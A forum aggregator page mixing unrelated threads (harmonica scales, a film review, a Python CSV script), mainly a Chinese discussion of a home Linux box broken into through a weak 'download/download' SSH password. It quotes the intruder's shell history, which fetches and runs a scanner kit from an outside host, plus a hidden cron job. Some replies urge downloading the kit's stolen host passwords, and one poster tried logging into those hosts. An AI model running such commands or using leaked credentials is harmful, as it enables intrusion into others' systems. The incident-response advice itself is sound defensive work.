avatar
l*g
2
☆─────────────────────────────────────☆
koder (koder) 于 (Fri May 15 06:37:19 2009) 提到:
想买个Hohner入门的复音口琴。才注意到音阶排列各不相同。我很多年前吹的
一只,音阶排列和自然音节非常接近,大概..12345617123456171..这样子。
请问那个Hohner金海洋是这样的吗?如果不是,什么型号是呢?准备请最近
过来的国内的朋友帮助带一个。谢谢。
☆─────────────────────────────────────☆
zudic (一只蛙) 于 (Fri May 15 23:24:52 2009) 提到:
我是吹十孔口琴的,对复音不了解。因为感兴趣,所以就查了一下。你习惯的那个音阶
类似半音阶口琴的音阶,适合吹奏旋律。不过似乎国内的大部分复音口琴都是一个适合
吹奏和弦的音阶排列。
如下转自中国口琴网:
一、复音口琴音阶排列类型
复音口琴音阶排列(以24孔复音口琴为例)大致分为三种类型。
一是合奏用复音口琴标准音阶排列,也就是所谓的“欧式音阶”排列。
如:|1|
avatar
n*r
3
【 以下文字转载自 LeisureTime 讨论区 】
发信人: neighbor (neighbor), 信区: LeisureTime
标 题: 五星级《万箭穿心》
发信站: BBS 未名空间站 (Wed Sep 4 22:05:55 2013, 美东)
五星级《万箭穿心》
Neighbor 于9/4/2013
2012《万箭穿心》是近年来少有的影片, 看了一遍, 想第二遍。影片在塑造人物上下
了很多功夫, 透着淡淡的女权主义味道, 让人不禁想到《芙蓉镇》。
90年代中期, 李宝莉(颜丙燕 饰)是一个武汉市井里的小人物, 小菜贩的女儿,自
己下岗也变成的买袜子小贩。丈夫马学武(焦刚 饰)是一家国企的厂办主任, 出生农
村, 但内里心高气傲。影片开始在马学武厂里分了新房,搬家前夜,李宝莉对未来的
生活无限憧憬,兴奋的睡不着,用脚一直钩着丈夫挑逗,马学武却表现冷淡。夫妻间的
一冷一热已为搬到新家的一系列不幸埋下伏笔。
丈夫对泼辣能干的小市民妻子已经失去了爱的能力。在李宝莉带着一头发卷,新家里再
次求爱后,马学武冷冷的丢了一句:“我们离婚吧!”。李宝莉之后反复利用儿子小宝
向丈夫示好,可是马学武俨然决心已下, 加上第三者周芬 (王沫溪 饰)的出现, 婚
姻已经名存实亡。
周芬是李宝莉的反面, 说话细声细气,打扮得体, 透着成熟少妇的风韵。 马学武讲
话的时候, 她用眼睛深情的注视, 哪怕是明显的喝酒吹牛, 她也专著用心聆听。 这
种近于崇拜的关切对感情饥渴的马学武是不可抗拒的。
李宝莉在旅馆门外听到丈夫和周芬偷情,周芬每一声娇羞的呻吟都变成刺向她的一把匕
首,使得她瘫坐在大街上。李宝莉怎么办?影片的独到之处是李宝莉迅速地克服了自己
破门而入的愤怒,在很短的时间一个计划已经形成。市井小民, 却工于心机, 用在湖
北人身上再恰当不过了。
在李宝莉的匿名举报下, 马学武和周芬被抓了卖淫嫖娼现行,厂办主任也丢了。李宝
莉大气地原谅了丈夫, 指望着丈夫的负罪感可以让她在挽救婚姻中斗争中占一点上风
。影片中实际上刻意把男性描绘成一个感情上的弱者,突出了男性感情上的天真和迷茫
。从李宝莉和好友小景(赵倩 饰)的对话中看出,马学武年轻时对李宝莉的追求是强
烈的。但影片中观众看到的更多的是他对李宝莉的排斥和厌恶。
马学武和周芬是影片刻意勾画的一个看点, 这是一段马学武自以为是的虚幻的爱情。
马学武和周芬偷情被抓后, 在一起吃热干面的场景,女的显得举重若轻, 男的诚惶诚
恐。周芬和主角李宝莉一样也是一个感情的驾驭者。假如马学武和周芬最后结合到一起
会怎样呢?周芬会不会变成另一个他厌烦的李宝莉呢?影片中的男性总体是幼稚和懦弱
的。
这更加反衬了李宝莉感情上的成熟和坚韧。无家可归的婆婆的突然来临, 她为了挽回
丈夫, 在小闹之后也选择了忍让。 可马学武在家庭和工作的双重压力下, 已经认命
选择了解脱。 得知妻子是造成他的一切不幸的告密者,只是压倒他的最后一根稻草。
李宝莉到底爱不爱丈夫呢? 这在丈夫寒酸的葬礼上给了答案, 对比婆婆和儿子小宝撕
心的哭声, 我们看到的李宝莉更多的是埋怨和怒其不争。原来她要挽回的婚姻只是一
个名分, 这也许连李宝莉自己都没有意识到。宝莉的好友小景把一切厄运归结于新房
的风水不好,楼下的马路四通八达,称之“万箭穿心”,个性倔强的李宝莉却不同意,
“万箭穿心”为什么不能是“万丈光芒”呢? 她放下架子,成为了一个收入颇高的扁
担工,直接挑起了婆婆和儿子小宝的重担。
影片在这里有一个十年的跳跃,成就了导演一个少有的批评社会的机会。李宝莉等社会
边缘人除了多了岁月的痕迹, 并没有乘上中国这辆全球最快的经济火车。 同样没赶上
车的是蹲了十年监狱的建建。建建大多用玩世不恭的市井气掩盖自己的失意,流氓身边
要有马子,李宝莉在一次半推半就的野和后,成了他重新进入社会的女人。相比和马学
武在一起,李宝莉和建建在一起到更显自然。
好景不长,李宝莉为了保护儿子小宝,用啤酒瓶打伤了建建。小宝因为失去爸爸对妈妈
一直嫉恨, 对妈妈多年的艰辛, 视而不见。李宝莉和建建在一起是小宝唾弃和无法理
解的。他偷偷见了父亲的老情人周芬, 证实了正是母亲“害”死了父亲。高考之后,
他要求断绝母子关系,逼着李宝莉离开这个家。
影片最激烈的一次冲突是李宝莉约小宝到屋顶, 怒气匆匆地冲上去给比自己高一头的
小宝一个大嘴巴。一副老娘教育儿子的凶相。小宝伤心的说出了心里的秘密, 从一个
孩子的眼里母亲“害”死了父亲是不可原谅的。看到这个时候, 我很怕电影大打亲情
牌,落入母子和好的俗套。
感谢导演王竟和编剧吴楠,影片从此进入了一个平静的高潮。小宝的陈述钩起了李宝莉
对过去不幸的回忆, 她一个人跑到江边独坐。夜已深了, 一片漆黑,我们看不到李宝
莉对自己的自责, 也看不出她对小宝不敬的原谅。更多的是对命运的无奈和抗争, 这
抗争在黑暗中渐渐坚定。 当早晨的太阳再次照到李宝莉脸上时,我们看到的是那个独
有的波澜不惊的微笑。
没有吵闹,李宝莉静静的收拾东西,挑扁担搬走了。 这个女人遭遇了这么多不幸, 本
应“万箭穿心”, 可和片中男人不同, 她没有选择解脱, 也不把自己的不幸推托给
别人,坚定地和命运抗争。
如果要一定吹毛求疵,影片的结尾是有改变的空间的。建建的出现显得有些画蛇添足,
就让李宝莉一个挑着扁担走到热闹的汉正街上好了, 然后融在漫漫的人群中。
演员的演技就不用多说了。 但觉得颜丙燕不如刘晓庆幸运。 刘靠《芙蓉镇》上了一个
台阶, 在中国那个时代, 无出其右。颜在这个物质浮躁的时代, 静下心来塑造了李
宝莉,希望一年后人们还记得她。对于我来说, 那个身边竖着扁担的漂亮女人是永远
不会磨灭的。
Neighbor 于9/4/2013
avatar
s*n
4
我的程序目的是把一个文件夹里面所有的csv file(4 columns each with same
variables)合并成一个文件。 总是得到IndexError: list index out of range
下面是我的程序:
import csv
import os
##this path is the location where raw data are stored
path = "C:/Users/Project/Python code/practice1/csv"
dirList=os.listdir(path)
##this fname is the output file name
fname = "C:/Users/Project/Python code/practice1/Combined file/combined.csv"
nfile = open(fname,'wb')
writer = csv.writer(nfile)
start = 0
for fn in dirList:
##this fullfn is the path for raw data plus file name
fullfn = "C:/Users/Project/Python code/practice1/csv/" + fn
reader = csv.reader(open(fullfn),delimiter=',')
cnt = 0
for column in reader:
if(start==0):
b=[column[0], column[1],column[2],column[3]]
writer = csv.writer(open(fullfn, 'w', newline=''), delimiter=',')
writer.writerow(b)
cnt = 1
start = 1
else:
if(cnt==0):
cnt = 1
continue
else:
b=[column[0], column[1],column[2],column[3]]
writer = csv.writer(open(fullfn, 'w', newline=''),
delimiter=',')
writer.writerow(b)
cnt = cnt + 1
nfile.close()
avatar
A*s
5
家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
bash的history:
uname -a
cat /proc/cpuinfo
ps x
passwd
cd /var/tmp
ls -a
wget freewebtown.com/arapa/as.tgz
tar zxvf as.tgz
rm -rf as.tgz
cd as
rm -rf vuln.txt
touch vuln.txt
chmod +x *
screen
现在的问题是怎么才能看到screen的history,我不知道他在这里做过什么,突然好害
怕…
另外有人知道as这个是干嘛的吗?
$find as
as
as/scan.log
as/nobash.txt
as/a
as/pass.txt
as/sshd
as/start
as/screen
as/pscan2
as/vuln.txt
avatar
H*S
6
3个小时之内不出来,那就是等明天了
avatar
s*n
7
我改好了,现在正常了。 贴出来分享:
import csv
import os
##this path is the location where raw data are stored
path = "C:/Users/Documents/Project/Python code/practice1/csv"
dirList=os.listdir(path)
##this fname is the output file name
fname = "C:/Users/Documents/Project/Python code/practice1/Combined file/
combined.csv"
nfile = open(fname,'w', newline='')
writer = csv.writer(nfile)
start = 0
for fn in dirList:
##this fullfn is the path for raw data plus file name
fullfn = "C:/Users/Documents/Project/Python code/practice1/csv/" + fn
reader = csv.reader(open(fullfn),delimiter=',')
cnt = 0
for r in reader:
if(start==0):
b=[r[0],r[1],r[2],r[3]]
print(b)
writer.writerow(b)
cnt = 1
start = 1
else:
if(cnt==0):
cnt = 1
continue
else:
b=[r[0],r[1],r[2],r[3]]
print (b)
writer.writerow(b)
cnt = cnt + 1
nfile.close()
avatar
l*g
8
does your computer directly connected to internet w/o router?

【在 A*******s 的大作中提到】
: 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
: bash的history:
: uname -a
: cat /proc/cpuinfo
: ps x
: passwd
: cd /var/tmp
: ls -a
: wget freewebtown.com/arapa/as.tgz
: tar zxvf as.tgz

avatar
t*e
9
你下班这么早?

【在 s**********r 的大作中提到】
: 真希望今天出来。看来只有等明天了。
avatar
A*s
10
22端口开了port forward……
发现it至少从今天早上就进来了
丫的兰州大学
Hostname: 202.201.13.98
ISP: China Education and Research Network
Organization: Lanzhou University
Proxy: None detected
Type: Cable/DSL

【在 l*****g 的大作中提到】
: does your computer directly connected to internet w/o router?
avatar
s*r
11
早来早走。在等一会。
avatar
wy
12
你干了啥对不起党和人民的事?

【在 A*******s 的大作中提到】
: 22端口开了port forward……
: 发现it至少从今天早上就进来了
: 丫的兰州大学
: Hostname: 202.201.13.98
: ISP: China Education and Research Network
: Organization: Lanzhou University
: Proxy: None detected
: Type: Cable/DSL

avatar
m*g
13
你几点上班的?两点多就下班了?

【在 s**********r 的大作中提到】
: 早来早走。在等一会。
avatar
l*g
14
It's just try to scan your system for possible break points. :)
maybe more can be found from the screen history.
but your system may be compromised.

【在 A*******s 的大作中提到】
: 22端口开了port forward……
: 发现it至少从今天早上就进来了
: 丫的兰州大学
: Hostname: 202.201.13.98
: ISP: China Education and Research Network
: Organization: Lanzhou University
: Proxy: None detected
: Type: Cable/DSL

avatar
t*e
15
打餐馆的?

【在 m******g 的大作中提到】
: 你几点上班的?两点多就下班了?
avatar
A*s
16
我一个爱国青年能做什么坏事……

【在 wy 的大作中提到】
: 你干了啥对不起党和人民的事?
avatar
H*s
17
什么呀。 医学 有关的 很多 上下班很早。 我 和 一个 搞医的 早上 5点CARPOOL
过。
avatar
A*s
18
我一个爱国青年能做什么坏事……
再请教一下:
/var/auth.log
Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for
user download by (uid=0)
Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for
user download
CRON这里是什么意思?

【在 wy 的大作中提到】
: 你干了啥对不起党和人民的事?
avatar
h*k
19
怎么这次大家这么high?
avatar
A*s
20
怎么看screen history啊?

【在 l*****g 的大作中提到】
: It's just try to scan your system for possible break points. :)
: maybe more can be found from the screen history.
: but your system may be compromised.

avatar
z*n
21
你,sudo crontab -l -u download
看看你的download user有啥crontab在run
估计就是那个兰州小孩装了个crontab在运行什么东东
那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
呵呵
如果你的download user没啥权限说不定也没啥大不了的
貌似他想在你的download user地下起一个chroot小系统
看完了把download user删除了吧
userdel -r download

for
for

【在 A*******s 的大作中提到】
: 我一个爱国青年能做什么坏事……
: 再请教一下:
: /var/auth.log
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for
: user download by (uid=0)
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for
: user download
: CRON这里是什么意思?

avatar
z*n
22
有点意思
freewebtown.com/arapa/as.tgz
你自己下载下来看看吧,呵呵

【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:

avatar
z*n
23
好玩,这个人把自己hacked system都列在txt文件里了
还留下bash history给你看,有趣

【在 z*********n 的大作中提到】
: 有点意思
: freewebtown.com/arapa/as.tgz
: 你自己下载下来看看吧,呵呵

avatar
z*n
24
你还可以看看你的系统现在download user正在干啥
ps -u download
看看他究竟在干啥,说不定也就是用你的机器在攻击别人

【在 z*********n 的大作中提到】
: 好玩,这个人把自己hacked system都列在txt文件里了
: 还留下bash history给你看,有趣

avatar
L*n
25
也不一定就是中国人啦,说不定是美国人先黑了兰州一台机器,再黑回来

【在 z*********n 的大作中提到】
: 你还可以看看你的系统现在download user正在干啥
: ps -u download
: 看看他究竟在干啥,说不定也就是用你的机器在攻击别人

avatar
z*n
26
不过你看那个文件
wzd's hacked machine
很像汉语拼音 王志东hack了的机器

【在 L***n 的大作中提到】
: 也不一定就是中国人啦,说不定是美国人先黑了兰州一台机器,再黑回来
avatar
A*s
27
我发现以后第一时间已经kill掉所有download的进程,然后把/etc/passwd里面
downlowd的shell设成false
还有什么地方需要看得吗?我就怕他留了什么后门在我这里,大不了我就重装一下系统
了……因为我看到这里http://ubuntuforums.org/archive/index.php/t-253373.html
You really should boot of a live CD. You can't analyse your system unless
you know you can trust the binaries you are using. The guest account has
logged in from a couple of addresses today already, you have been cracked
and you can't trust your system anymore. You must boot off of a live cd and
then start inspecting init,

【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:

avatar
wy
28
yeah, right

【在 L***n 的大作中提到】
: 也不一定就是中国人啦,说不定是美国人先黑了兰州一台机器,再黑回来
avatar
A*s
29
$ sudo crontab -l -u download
* * * * * /home/download/ /. /.logan/update >/dev/null 2>&1
这个啥意思?

【在 z*********n 的大作中提到】
: 你,sudo crontab -l -u download
: 看看你的download user有啥crontab在run
: 估计就是那个兰州小孩装了个crontab在运行什么东东
: 那个as,谁知道是啥的,你自己wget那个网址那个文件打开看看就知道了
: 呵呵
: 如果你的download user没啥权限说不定也没啥大不了的
: 貌似他想在你的download user地下起一个chroot小系统
: 看完了把download user删除了吧
: userdel -r download
:

avatar
z*n
30
永远运行那个.logan/upate程序
你还是把download user彻底删除了吧
你第一时间删除了那些process也没用,crontab还会调用他装的
guest system的命令的
当然最谨慎的做法是重装系统得了

【在 A*******s 的大作中提到】
: $ sudo crontab -l -u download
: * * * * * /home/download/ /. /.logan/update >/dev/null 2>&1
: 这个啥意思?

avatar
A*e
31
其实可以留着玩儿啊。和黑客互斗。每天在版上更新一下,大家给出谋划策。
对了,那个黑客会不会在这里潜水啊?

【在 z*********n 的大作中提到】
: 永远运行那个.logan/upate程序
: 你还是把download user彻底删除了吧
: 你第一时间删除了那些process也没用,crontab还会调用他装的
: guest system的命令的
: 当然最谨慎的做法是重装系统得了

avatar
z*n
32
他用你的系统scan别人的机器,如果破解了,利用你的机器攻击别人
最后可能你hold responsibility啊,不过,大部分时候估计没这么严重
你自己掂量着玩吧,别用你太多带宽就好,呵呵
你也可以tcpdump一下看看他究竟在干些啥,娱乐娱乐

【在 A**********e 的大作中提到】
: 其实可以留着玩儿啊。和黑客互斗。每天在版上更新一下,大家给出谋划策。
: 对了,那个黑客会不会在这里潜水啊?

avatar
z*n
33
哦,对了,你修改你的系统的/etc/passwd可能还是没用
貌似他在download user地下起了一个sub system,他用那个底下的
sshd照样能log到那个guest 系统,呵呵
虽说对你也许破坏不了啥,但也是利用你的资源
你不在乎就好

【在 z*********n 的大作中提到】
: 他用你的系统scan别人的机器,如果破解了,利用你的机器攻击别人
: 最后可能你hold responsibility啊,不过,大部分时候估计没这么严重
: 你自己掂量着玩吧,别用你太多带宽就好,呵呵
: 你也可以tcpdump一下看看他究竟在干些啥,娱乐娱乐

avatar
A*s
34
如果他没获得其他帐号的权限的话,他是怎么实现的呢?/home/download/ 里面没有任
何可疑的文件啊。

【在 z*********n 的大作中提到】
: 哦,对了,你修改你的系统的/etc/passwd可能还是没用
: 貌似他在download user地下起了一个sub system,他用那个底下的
: sshd照样能log到那个guest 系统,呵呵
: 虽说对你也许破坏不了啥,但也是利用你的资源
: 你不在乎就好

avatar
z*n
35
我估计放在/home/download/.logan底下了
user level guest os不是新鲜事

【在 A*******s 的大作中提到】
: 如果他没获得其他帐号的权限的话,他是怎么实现的呢?/home/download/ 里面没有任
: 何可疑的文件啊。

avatar
z*n
36
当然也可能/var/tmp 或者/tmp底下

【在 z*********n 的大作中提到】
: 我估计放在/home/download/.logan底下了
: user level guest os不是新鲜事

avatar
A*s
37
没有啦,系统目录里面根本没有logan这个字符串
[email protected]:/# find / -name "*logan*"
[email protected]:/# find / -user download
/var/run/screen/S-download
/home/download
/home/download/.bash_history
/home/download/.bash_logout
/home/download/.bashrc
/home/download/.profile
/home/download/.ssh
/home/download/.ssh/known_hosts

【在 z*********n 的大作中提到】
: 我估计放在/home/download/.logan底下了
: user level guest os不是新鲜事

avatar
z*n
38
你有没有进到那个screen session里边看看在运行啥

【在 A*******s 的大作中提到】
: 没有啦,系统目录里面根本没有logan这个字符串
: [email protected]:/# find / -name "*logan*"
: [email protected]:/# find / -user download
: /var/run/screen/S-download
: /home/download
: /home/download/.bash_history
: /home/download/.bash_logout
: /home/download/.bashrc
: /home/download/.profile
: /home/download/.ssh

avatar
A*s
39
当时一紧张都kill掉了……貌似现在没法看screen的history了

【在 z*********n 的大作中提到】
: 你有没有进到那个screen session里边看看在运行啥
avatar
A*s
40
我试着(用download帐号)运行it下载那个包里面的screen,提示
./screen: error while loading shared libraries: libutempter.so.0: cannot
open shared object file: No such file or directory
我再用download帐号运行系统的screen,提示
Cannot open your terminal '/dev/pts/1' - please check.
这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
[email protected]:/var/tmp/as$ ls -l /dev/pts/
total 0
crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1
看bash history,他是想运行系统的screen,那是不是说他也没成功把screen打开呢?
avatar
z*n
41
根据你一楼的帖子,他运行的是系统screen
所以肯定然后在screen里边做了一些事情的
你看那个bash history里,是screen
没有path,调用的一定是系统的screen
你刚才还列出一个/var/run/screen/S-download
这个就是证明screen在download用户下在运行
不知道是还在运行,还是被你kill -9后那个文件没杀掉
你确定现在没有screen process在运行了?

【在 A*******s 的大作中提到】
: 我试着(用download帐号)运行it下载那个包里面的screen,提示
: ./screen: error while loading shared libraries: libutempter.so.0: cannot
: open shared object file: No such file or directory
: 我再用download帐号运行系统的screen,提示
: Cannot open your terminal '/dev/pts/1' - please check.
: 这个貌似是/dev/pts/1权限设置的问题,我觉得it不可能改动。
: [email protected]:/var/tmp/as$ ls -l /dev/pts/
: total 0
: crw------- 1 xxx tty 136, 0 2009-07-20 01:46 0
: crw------- 1 xxx tty 136, 1 2009-07-20 01:53 1

avatar
A*s
42
[email protected]:~# ps aux |grep screen
root 4801 0.0 0.1 3112 724 pts/0 S+ 02:08 0:00 grep screen
现在又可以从download运行系统的screen…真奇怪。
不过我试了一下,/var/run/screen 下面那个文件夹只要运行过一次screen就会一直存
在的,貌似
如果screen被kill了,那么S-download/里面会留下一个socket
如果screen是exit的,那么S-download/就会被清空,包括之前kill留下的socket

【在 z*********n 的大作中提到】
: 根据你一楼的帖子,他运行的是系统screen
: 所以肯定然后在screen里边做了一些事情的
: 你看那个bash history里,是screen
: 没有path,调用的一定是系统的screen
: 你刚才还列出一个/var/run/screen/S-download
: 这个就是证明screen在download用户下在运行
: 不知道是还在运行,还是被你kill -9后那个文件没杀掉
: 你确定现在没有screen process在运行了?

avatar
E*V
43
cron job

for
for

【在 A*******s 的大作中提到】
: 我一个爱国青年能做什么坏事……
: 再请教一下:
: /var/auth.log
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session opened for
: user download by (uid=0)
: Jul 19 22:18:01 alex CRON[26507]: pam_unix(cron:session): session closed for
: user download
: CRON这里是什么意思?

avatar
L*s
44
你就是个肉鸡罢了...
avatar
Z*0
45
大家下载那个文件,打开看看。里边有很多肉机的密码和IP。里边有个这个东西:
WZD's hacked servers。 :)。
这个是个后门程序,自带sshd,screen, start, pscan2. 看起来主要用来扫描机器,
破解秘密用的。

【在 A*******s 的大作中提到】
: 家里的其中一台电脑之前开了一个download用户,估计是被对方猜到密码了
: bash的history:
: uname -a
: cat /proc/cpuinfo
: ps x
: passwd
: cd /var/tmp
: ls -a
: wget freewebtown.com/arapa/as.tgz
: tar zxvf as.tgz

avatar
a*e
46
kao,俺得找找里面有没有俺的服务器

【在 Z**0 的大作中提到】
: 大家下载那个文件,打开看看。里边有很多肉机的密码和IP。里边有个这个东西:
: WZD's hacked servers。 :)。
: 这个是个后门程序,自带sshd,screen, start, pscan2. 看起来主要用来扫描机器,
: 破解秘密用的。

avatar
f*Q
47
没有俺的

【在 a*******e 的大作中提到】
: kao,俺得找找里面有没有俺的服务器
avatar
z*n
48
从这个例子也看出来,搞个linux的肉鸡多不容易,还得亲自log
in, deploy code
还是windows听话,传播个病毒就搞定了,全自动的

【在 f*****Q 的大作中提到】
: 没有俺的
avatar
a*e
49
嘿嘿,大虾们,哪个是肉鸡啊?俺看了半天咋都没看出来?

【在 z*********n 的大作中提到】
: 从这个例子也看出来,搞个linux的肉鸡多不容易,还得亲自log
: in, deploy code
: 还是windows听话,传播个病毒就搞定了,全自动的

avatar
A*s
50
下载那个包里面那些txt就是吧,估计我的也会进入下一个版本了 :-p

【在 a*******e 的大作中提到】
: 嘿嘿,大虾们,哪个是肉鸡啊?俺看了半天咋都没看出来?
avatar
a*e
51
是有些txt阿,可是看不懂,怎莫看哪个是肉鸡?还是大家都是皇帝的新衣,哈哈哈哈

【在 A*******s 的大作中提到】
: 下载那个包里面那些txt就是吧,估计我的也会进入下一个版本了 :-p
avatar
z*n
52
所谓肉鸡,就是被compromise了的机器,可以用来攻击别人
所以楼主同学未必本身机器受到了啥伤害,但是沦为肉鸡,别人
能利用他的机器攻击别人了
一般来说用他的机器scan别人继续找别的机器的漏洞而已

【在 a*******e 的大作中提到】
: 是有些txt阿,可是看不懂,怎莫看哪个是肉鸡?还是大家都是皇帝的新衣,哈哈哈哈
avatar
a*e
53
俺知道啥是肉鸡。
俺是说,前面有人说那些文件里有好多肉鸡,可是怎么分辨哪个是?还是所有那些ip都
是肉鸡?
没有取得bash或者其他的shell的能算肉鸡吗?

【在 z*********n 的大作中提到】
: 所谓肉鸡,就是被compromise了的机器,可以用来攻击别人
: 所以楼主同学未必本身机器受到了啥伤害,但是沦为肉鸡,别人
: 能利用他的机器攻击别人了
: 一般来说用他的机器scan别人继续找别的机器的漏洞而已

avatar
z*n
54
你去亲自一个个实验一下吧,呵呵

【在 a*******e 的大作中提到】
: 俺知道啥是肉鸡。
: 俺是说,前面有人说那些文件里有好多肉鸡,可是怎么分辨哪个是?还是所有那些ip都
: 是肉鸡?
: 没有取得bash或者其他的shell的能算肉鸡吗?

avatar
a*e
55
......俺试过的几个
都ssh不上。。。。。。。
所以才问你们咋知道哪个是肉鸡

【在 z*********n 的大作中提到】
: 你去亲自一个个实验一下吧,呵呵
avatar
z*n
56
我估计也就是那个wzd曾经猜出密码登录过的机器
大部分人和楼主似的,发现了就关门了,或者是什么dsl机器等等,重启就ip变了之类的
不像个什么牛x黑客

【在 a*******e 的大作中提到】
: ......俺试过的几个
: 都ssh不上。。。。。。。
: 所以才问你们咋知道哪个是肉鸡

avatar
A*s
57
其实我google了以下pscan2,发现别人报告的案例都是查不多的一些文件,譬如有个
pscan2,有个vuln.txt等等
再看a那个script,也就是echo部分和网上的不一样而已,其余都差不多,估计真是个
业余分子,网上搜了下教程就开搞了。
以后不能设弱智密码了,还有就是临时用完的帐号一定要记得disable掉

类的

【在 z*********n 的大作中提到】
: 我估计也就是那个wzd曾经猜出密码登录过的机器
: 大部分人和楼主似的,发现了就关门了,或者是什么dsl机器等等,重启就ip变了之类的
: 不像个什么牛x黑客

avatar
z*n
58
download / download ?呵呵

【在 A*******s 的大作中提到】
: 其实我google了以下pscan2,发现别人报告的案例都是查不多的一些文件,譬如有个
: pscan2,有个vuln.txt等等
: 再看a那个script,也就是echo部分和网上的不一样而已,其余都差不多,估计真是个
: 业余分子,网上搜了下教程就开搞了。
: 以后不能设弱智密码了,还有就是临时用完的帐号一定要记得disable掉
:
: 类的

avatar
A*s
59
you got it...

【在 z*********n 的大作中提到】
: download / download ?呵呵
avatar
p*s
60
仔细看没多少IP

【在 z*********n 的大作中提到】
: 你去亲自一个个实验一下吧,呵呵
avatar
c*0
61
呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有
download只有一个字典项,
$ cat pass.txt | grep download
download download
结果lz就中招了。
avatar
z*n
62
而且那个字典文件好超级小,楼主这招中得太简单了,呵呵

【在 c********0 的大作中提到】
: 呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有
: download只有一个字典项,
: $ cat pass.txt | grep download
: download download
: 结果lz就中招了。

avatar
A*s
64
是我错了……

【在 c********0 的大作中提到】
: 呵呵,这个程序是用 密码字典 试出的download密码。看看那个pass.txt文件,只有
: download只有一个字典项,
: $ cat pass.txt | grep download
: download download
: 结果lz就中招了。

avatar
z*n
65
我以前做过一家公司,那个程序员把密码直接mysql text field存
全部clear text,我没事干select了一下那些密码看,笑死
超级多的简单密码
password1是最多的
还有fuck Password letmein 等等
用这些密码就别怪别人break in了

【在 A*******s 的大作中提到】
: 是我错了……
相关阅读
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。